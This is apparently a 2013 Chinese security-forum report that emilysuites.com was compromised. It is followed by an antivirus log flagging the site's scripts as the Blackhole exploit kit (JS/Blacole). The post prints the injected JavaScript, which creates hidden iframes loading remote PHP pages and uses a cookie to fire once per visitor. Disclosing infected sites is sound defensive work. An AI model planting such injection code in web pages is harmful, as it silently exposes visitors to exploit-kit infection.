http://www.emilysuites.com/

显示全部楼层 · 发表于 2013-8-21 06:51:43

function pw09() {
var static = 'ajax';
var controller = 'index.php';
var pw = document.createElement('iframe');
pw.src = 'http://216.133.170.218/Ch7FwBQn.php';
pw.style.position = 'absolute';
pw.style.color = '59169';
pw.style.height = '59169px';
pw.style.width = '59169px';
pw.style.left = '100059169';
pw.style.top = '100059169';
if (!document.getElementById('pw')) {
document.write('<p id=\'pw\' class=\'pw09\' ></p>');
document.getElementById('pw').appendChild(pw);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
pw09();
}
}

复制代码

function zzzfff() {
var ztba = document.createElement('iframe');
ztba.src = 'http://lioton.com.hk/images/CNpP4tk7.php';
ztba.style.position = 'absolute';
ztba.style.border = '0';
ztba.style.height = '1px';
ztba.style.width = '1px';
ztba.style.left = '1px';
ztba.style.top = '1px';
if (!document.getElementById('ztba')) {
document.write('<div id=\'ztba\'></div>');
document.getElementById('ztba').appendChild(ztba);
}
}

复制代码

Avira

2013/8/21 上午 06:49 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\V06BEYUS\lightbox[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
   已採取動作：
   檔案會移動至 '4f3e7357.qua' 名稱底下的隔離區目錄。.

2013/8/21 上午 06:49 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\Y8WQU0Q2\prototype[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
   已採取動作：
   檔案會移動至 '57515cc7.qua' 名稱底下的隔離區目錄。.

2013/8/21 上午 06:49 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 799
   目錄數： 0
   惡意程式碼數： 3
   警告數： 0

2013/8/21 上午 06:49 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\HH0NO8WJ\scriptaculous[1].js'
   包含病毒或有害的程式 'JS/Blacole.EB.46' [virus]
   已採取動作：
   檔案會移動至 '1d9e29b9.qua' 名稱底下的隔離區目錄。.

2013/8/21 上午 06:49 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\N92GKAZK\emilysuites_com[1].htm'
   包含病毒或有害的程式 'JS/Blacole.DO.1' [virus]
   已採取動作：
   發生錯誤，檔案未刪除。錯誤識別碼：26003.
   檔案無法刪除！.
   嘗試使用 ARK 程式庫執行動作。.
   檔案會移動至 '4cf974c9.qua' 名稱底下的隔離區目錄。.

2013/8/21 上午 06:49 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 797
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/8/21 上午 06:48 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\HH0NO8WJ\scriptaculous[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 上午 06:48 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\V06BEYUS\lightbox[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 上午 06:48 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\HH0NO8WJ\scriptaculous[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：拒絕存取

2013/8/21 上午 06:48 [Web Protection] 發現惡意程式碼
   從 URL "http://www.emilysuites.com/js/scriptaculous.js?load=effects,builder"
   存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/8/21 上午 06:48 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\Y8WQU0Q2\prototype[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 上午 06:48 [Web Protection] 發現惡意程式碼
   從 URL "http://www.emilysuites.com/js/lightbox.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/8/21 上午 06:48 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\Y8WQU0Q2\prototype[1].js 中
   偵測到病毒或有害的程式 'JS/Blacole.EB.46 [virus]'
   執行的動作：拒絕存取

2013/8/21 上午 06:48 [Web Protection] 發現惡意程式碼
   從 URL "http://www.emilysuites.com/js/prototype.js" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.EB.46' [virus]。
   已採取動作：已略過

2013/8/21 上午 06:48 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\N92GKAZK\emilysuites_com[1].htm 中
   偵測到病毒或有害的程式 'JS/Blacole.DO.1 [virus]'
   執行的動作：傳輸至掃描程式

2013/8/21 上午 06:48 [Web Protection] 發現惡意程式碼
   從 URL "http://www.emilysuites.com/" 存取資料時，
   發現病毒或有害的程式 'JS/Blacole.DO.1' [virus]。
   已採取動作：已略過

[已鉴定] http://www.emilysuites.com/